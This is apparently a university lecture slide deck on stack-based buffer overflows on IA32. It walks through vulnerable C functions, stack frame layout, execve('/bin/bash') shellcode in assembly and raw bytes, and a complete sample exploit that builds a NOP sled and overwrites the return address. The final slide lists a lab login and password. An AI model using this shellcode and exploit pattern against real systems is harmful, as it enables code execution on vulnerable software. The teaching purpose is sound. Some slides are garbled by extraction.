Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Introduction Buffer overflows: write outside the boundaries of an array Can be used to overwrite adjacent memory The stack contains control-flow related data, e.g. return addresses Overwriting this data allows an attacker to execute new or existing code
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Buffer overflows (on IA32) int main(int argc, char **argv) { int a; char buf[100]; strcpy(buf, argv); } Int a is allocated on the stack: 4 bytes Buf has memory allocated for 100 chars: 100 bytes Argv could be larger than that, allowing an attacker to overwrite a in this example
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Buffer overflow on IA32 int a char buf[100] High addr Low addr
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Stack based buffer overflows void f1(char *a) { char buffer[100]; strcpy(buffer, a); } void f0(char *b) { f1(b); }
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Stack frame f1 Stack-based buffer overflows f0: … … call f1 Return address f0 Stack Saved Frame Ptr f0 Local variables f0 Arguments f1 f1: buffer[] … overflow() Buffer Return address f1 Stack frame f0 Injected code Saved Frame Ptr f1 High addr
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode Code to execute once the return address has been overwritten Usually inserted into buffer that is used to overflow Some subtleties: a NULL will terminate an strcpy, \n will terminate gets
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Example code #include int main() { char *argv[2]; argv[0] = "/bin/bash"; argv[1] = 0; execve(argv[0], argv, 0); }
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Example transformed to assembly .type main: push $0x68 # Place h on the stack. push $0x f # Place sab/ on the stack. push $0x6e69622f # Place nib/ on the stack. mov %esp,%ebx # Copy the pointer to /bin/bash to ebx. xor %edx,%edx # Empty edx. push %edx # Place a NULL on the stack to terminate the argv. push %ebx # Place the pointer to /bin/bash on the stack. mov %esp,%ecx # Copy the pointer to the pointer to /bin/bash into ecx. mov $0xb,%eax # Let the syscall know we want execve int $0x80 # Do the system call
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode (gdb) x/27b main 0x : 0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68 0x : 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2 0x : 0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00 0x : 0x00 0xcd 0x80
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Shellcode .globl main.type main: push $0x68 push $0x f push $0x6e69622f mov %esp,%ebx xor %edx,%edx push %edx push %ebx mov %esp,%ecx xor %eax,%eax # set %eax to 0 mov $0xb,%al # copy 0xb into %al (least signicant byte of %eax) int $0x80
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Overview Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Sample vulnerable program void function(int a, char *b) { char string1[10]; char string2[50]; strcpy(string2,b); } int main(int argc, char **argv) { function(1,argv[1]); }
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Sample exploit #include #include char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; #define ADDR 0xbffffe2c int main() { char overflow[72]; char *argv[3] = { "./bufferoverflow", overflow, NULL }; memset(overflow,'\x90',72); // fill with NOPs *(long *) &overflow[68] = ADDR; // replace ret. addr. memcpy(overflow, shellcode, strlen(shellcode)); execve(argv[0],argv,0); // exex program }
Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, Conclusion Follow “Gera’s Insecure Programming by example” : ming/ ming/ Login/pass for the computers: cstudy/distrinet